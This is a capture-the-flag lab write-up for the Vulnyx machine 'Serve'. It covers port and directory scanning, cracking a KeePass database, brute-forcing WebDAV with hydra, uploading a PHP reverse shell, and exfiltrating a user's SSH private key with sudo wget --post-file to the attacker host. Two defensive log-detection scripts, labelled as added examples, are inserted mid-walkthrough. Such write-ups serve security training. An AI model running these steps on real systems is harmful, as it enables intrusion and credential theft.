Vlx_Serve

Machine source: https://vulnyx.com/

Difficulty: Easy

Mind map: [image]

I. Information gathering

1. Host discovery
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:A1:CD:6A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.10
Host is up (0.00046s latency).
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.55 seconds

Target IP: 192.168.2.10

2. Port scanning

1) Full port scan
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.10
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:31 +0800
Nmap scan report for 192.168.2.10
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.68 seconds

Open ports: 22, 80

2) Service and version scan
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.10
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:32 +0800
Nmap scan report for 192.168.2.10
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9a:0c:75:5a:bb:bb:06:a2:9a:7d:be:91:ca:45:45:e4 (RSA)
| 256 07:7d:e7:0f:0b:5e:5a:90:e9:33:72:68:49:3b:f5:8c (ECDSA)
|_ 256 6c:15:32:a7:42:e7:9f:da:63:66:7d:3a:be:fb:bf:14 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.75 seconds

3) UDP scan
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.10
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:32 +0800
Nmap scan report for 192.168.2.10
Host is up (0.00060s latency).
All 100 scanned ports on 192.168.2.10 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.29 seconds

II. Web penetration

1. Port 80

Browsing to port 80 shows only the Apache default page.

2. Directory scanning
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.html (Status: 200) [Size: 10701]
javascript (Status: 301) [Size: 317] [--> http://192.168.2.10/javascript/]
notes.txt (Status: 200) [Size: 173]
secrets (Status: 301) [Size: 314] [--> http://192.168.2.10/secrets/]
webdav (Status: 401) [Size: 459]

Found: /notes.txt, /secrets, /webdav

View /notes.txt:
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.10/notes.txt
Hi teo,

the database with your credentials to access the resource are in the secret directory

(Don't forget to change X to your employee number)

regards

IT department

The note tells us that the database file holding user teo's credentials is in the secrets directory, and that X has to be replaced with a number.

Scan the /secrets directory recursively. Since we are looking for a database file, only database-type extensions need to be tried, e.g. .sql, .db, .sqlite, .kdbx:
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.10/secrets/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sql,sqlite,db,kdbx

db.kdbx (Status: 200) [Size: 2078]

Found the database file db.kdbx.

3. The kdbx file

A .kdbx file is the encrypted database format used by the KeePass password manager, so the file is encrypted and its master password has to be cracked. Use john:
┌──(root㉿kali)-[~/miaosec]
└─# keepass2john db.kdbx > tmp

┌──(root㉿kali)-[~/miaosec]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dreams (db)
1g 0:00:00:03 DONE (2026-03-27 11:33) 0.2762g/s 185.6p/s 185.6c/s 185.6C/s sunshine1..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password for db.kdbx is dreams.

Opening it with an online tool gives the username and password: admin:w3bd4vXXX

Per the hint, XXX needs to be replaced with a number, so generate the candidate list:
┌──(root㉿kali)-[/tmp]
└─# seq -f "w3bd4v%03g" 0 999 > pass.txt

4. HTTP brute force

/webdav requires a login; use hydra with the credentials obtained so far:
┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -l admin -P pass.txt http-get://192.168.2.10/webdav
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-27 15:17:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:1/p:1000), ~250 tries per task
[DATA] attacking http-get://192.168.2.10:80/webdav
[80][http-get] host: 192.168.2.10 login: admin password: w3bd4v513
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-27 15:17:24

Password obtained: w3bd4v513

5. WebDAV

Logging in with the credentials succeeds, but the directory is empty.

WebDAV is an extension of HTTP that turns the web server into a file manager: plain HTTP is mostly for viewing (downloading) pages, whereas WebDAV lets you read, write, move, copy and lock files on the remote server as if it were a local disk.

So we can upload a file to the server; use curl for the upload:
┌──(root㉿kali)-[/tmp]
└─# curl --digest -u admin:w3bd4v513 -T rev.php http://192.168.2.10/webdav/rev.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/rev.php has been created.</p>
<hr />
<address>Apache/2.4.38 (Debian) Server at 192.168.2.10 Port 80</address>
</body></html>

The file is now on the server.

III. Getting a shell

Start a listener on Kali, then request rev.php to get a shell:
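Added example (not from the writeup or from the Vulnyx machine): a small Python detector a defender could run over Apache access logs to catch exactly the sequence above, a script file created under the WebDAV path with PUT and later requested with GET. The log lines, the /webdav/ prefix and the extension list are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines modelled on the upload above
# (the PUT returning 201 and the later GET of rev.php); not real logs.
SAMPLE_LOG = """\
192.168.2.4 - - [27/Mar/2026:15:20:01 +0800] "PROPFIND /webdav/ HTTP/1.1" 207 512 "-" "curl/8.5.0"
192.168.2.4 - admin [27/Mar/2026:15:21:10 +0800] "PUT /webdav/rev.php HTTP/1.1" 201 459 "-" "curl/8.5.0"
192.168.2.4 - admin [27/Mar/2026:15:21:12 +0800] "PUT /webdav/notes.txt HTTP/1.1" 201 459 "-" "curl/8.5.0"
192.168.2.4 - - [27/Mar/2026:15:21:30 +0800] "GET /webdav/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.2.4 - - [27/Mar/2026:15:22:00 +0800] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Extensions the web server would execute rather than serve as data (assumed list)
SCRIPT_EXT = (".php", ".phtml", ".phar", ".cgi", ".pl", ".py", ".sh")


def find_webdav_uploads(log_text, dav_prefix="/webdav/"):
    """Report script files created under dav_prefix via a successful PUT.
    Severity is 'critical' when the same path is later fetched with GET,
    which means the server has executed the uploaded file."""
    created = {}                  # path -> fields of the first successful PUT
    executed = defaultdict(list)  # path -> timestamps of later GETs
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not path.startswith(dav_prefix) or not path.lower().endswith(SCRIPT_EXT):
            continue
        if m.group("method") == "PUT" and m.group("status").startswith("2"):
            created.setdefault(path, m.groupdict())
        elif m.group("method") == "GET" and path in created:
            executed[path].append(m.group("ts"))
    return [{
        "path": path,
        "uploaded_by": rec["user"],      # the Digest-auth user Apache logged
        "src_ip": rec["ip"],
        "severity": "critical" if path in executed else "high",
        "executed_at": executed.get(path, []),
    } for path, rec in created.items()]
```

The same check applied to the Apache configuration is simpler still: the WebDAV location should not have a PHP handler at all, so that an uploaded .php is served as text instead of run.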
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.10] 44496
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stabilize the shell:
/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege escalation

1. Getting teo's privileges

Check sudo -l:
Matching Defaults entries for www-data on Serve:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
(teo) NOPASSWD: /usr/bin/wget

The GTFOBins method does not work here:
www-data@serve:/var/www/webdav$ echo -e '#!/bin/sh\n/bin/sh 1>&0' > shell
www-data@serve:/var/www/webdav$ chmod +x shell
www-data@serve:/var/www/webdav$ sudo -u teo /usr/bin/wget --use-askpass=shell 0
Error spawning shell: 2

Use the upload method instead: post id_rsa to our own machine with wget:
sudo -u teo /usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.2.4 4444

Successfully obtained id_rsa. The key is passphrase-protected (its PEM header reads Proc-Type: 4,ENCRYPTED with DEK-Info: DES-EDE3-CBC), so the passphrase has to be cracked.
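Added example (not part of the original writeup): a Python scan over sudo's auth.log entries that flags the two sudo -u teo wget invocations shown above, i.e. a web service account using sudo to switch user, wget given an option that sends a local file or runs a helper program, and a command that touches a credential path. The log lines and the option and path lists are constructed assumptions.

```python
import re

# Constructed auth.log lines in sudo's syslog format, modelled on the two
# sudo -u teo wget invocations in this writeup (not copied from a real host).
SAMPLE_AUTH_LOG = """\
Mar 27 15:19:40 serve sudo: www-data : TTY=pts/0 ; PWD=/var/www/webdav ; USER=teo ; COMMAND=/usr/bin/wget --use-askpass=shell 0
Mar 27 15:20:05 serve sudo: www-data : TTY=pts/0 ; PWD=/var/www/webdav ; USER=teo ; COMMAND=/usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.2.4 4444
Mar 27 15:25:12 serve sudo:      teo : TTY=pts/1 ; PWD=/home/teo ; USER=root ; COMMAND=/usr/local/bin/bro help
Mar 27 15:26:00 serve sudo:      teo : TTY=pts/1 ; PWD=/home/teo ; USER=teo ; COMMAND=/usr/bin/wget https://example.invalid/pkg.tar.gz
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<caller>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# wget options that upload a local file or execute a helper program (assumed list)
EXFIL_OPTS = ("--post-file=", "--body-file=", "--use-askpass=")
# paths whose appearance in any sudo command deserves a look (assumed list)
SENSITIVE = ("/.ssh/", "/etc/shadow", "/etc/sudoers", ".kdbx")


def score_sudo_line(line):
    """Return (severity, reason) for one sudo log line, or None if benign."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    caller, target, cmd = m.group("caller"), m.group("target"), m.group("cmd")
    reasons = []
    if caller == "www-data" and target != caller:
        reasons.append("web service account switching user via sudo")
    if cmd.split()[0].endswith("/wget") and any(o in cmd for o in EXFIL_OPTS):
        reasons.append("wget told to send a local file or run a helper")
    if any(s in cmd for s in SENSITIVE):
        reasons.append("command references a credential file")
    if not reasons:
        return None
    severity = "critical" if len(reasons) >= 2 else "medium"
    return severity, f"{caller}->{target}: " + "; ".join(reasons)


def scan_auth_log(text):
    """Scan a whole log; return [(syslog timestamp, severity, reason), ...]."""
    hits = []
    for line in text.splitlines():
        result = score_sudo_line(line)
        if result:
            hits.append((line[:15], *result))   # first 15 chars = syslog timestamp
    return hits
```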


Crack it with RSAcrack:
┌──(root㉿kali)-[~/Tool]
└─# ./RSAcrack -k /tmp/id_rsa -w techyou.txt

╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[i] Cracking | /tmp/id_rsa
[i] Wordlist | techyou.txt
[*] Status | 2005/20000/10%/private
[+] Password | private
─────────────────────────────

The passphrase for id_rsa is private.

Log in as teo:
┌──(root㉿kali)-[~/Tool]
└─# ssh teo@192.168.2.10 -i /tmp/id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key '/tmp/id_rsa':
Linux serve 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
teo@serve:~$ id
uid=1000(teo) gid=1000(teo) groups=1000(teo)

2. Getting root

Check sudo -l:
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/bro

Look at the usage:
teo@serve:~$ sudo /usr/local/bin/bro help
...
NAME:

bro

DESCRIPTION:

Highly readable supplement to man pages.

Shows simple, concise examples for commands.
...

It works much like man.

Running the command below should escalate straight to root, but for some reason it failed here, complaining that curl is not in the database:
sudo /usr/local/bin/bro curl
!/bin/bash

V. Flag
teo@serve:~$ cat user.txt 
28bf16070abffab749a16bd11f635474

http://miao-sec.github.io/Vulnyx/Vlx-Serve/
Author: Miao
Published: 27 March 2026
License: BY-MIAO